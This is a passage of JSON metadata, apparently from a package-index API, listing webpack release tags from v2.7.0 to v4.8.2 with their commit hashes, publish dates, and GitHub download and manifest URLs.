rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","k